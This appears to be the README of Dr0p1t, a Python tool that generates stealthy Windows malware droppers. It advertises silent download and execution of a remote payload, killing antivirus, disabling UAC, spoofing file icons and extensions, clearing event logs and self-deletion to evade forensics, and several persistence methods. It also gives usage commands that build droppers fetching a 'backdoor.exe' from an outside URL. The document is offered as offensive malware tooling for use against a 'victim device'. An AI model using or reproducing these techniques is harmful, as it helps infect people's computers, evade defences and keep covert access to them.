In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks.
+ Generated executable properties:
- The executable size is smaller compared to other droppers generated the same way.
- Download executable on target system and execute it silently..
- Self destruct function so that the dropper will kill and delete itself after finishing it work
- Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
- Clear event log after finishing.
+ Framework properties:
- Find and kill antivirus before running the malware.
- The ability to disable UAC.
- The ability to run your malware as admin.
- Full spoof by spoofing the file icon and extension to any thing you want.
- ZIP files support so now you can compress your executable to zip file before uploading.
- Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
- In running powershell scripts it can bypass execution policy
- Using UPX to compress the dropper after creating it
- Adding executable after downloading it to startup.
- Adding executable after downloading it to task scheduler ( UAC not matters ).
- Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn’t exist.
Usage: Dr0p1t.py Malware_Url [Options]
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don’t use 3.6 because it’s not supported yet by PyInstaller
Needed dependencies for Linux
- Others will be installed from install.sh file
Note : You must have root access
Needed dependencies for windows
- Modules in windows_requirements.txt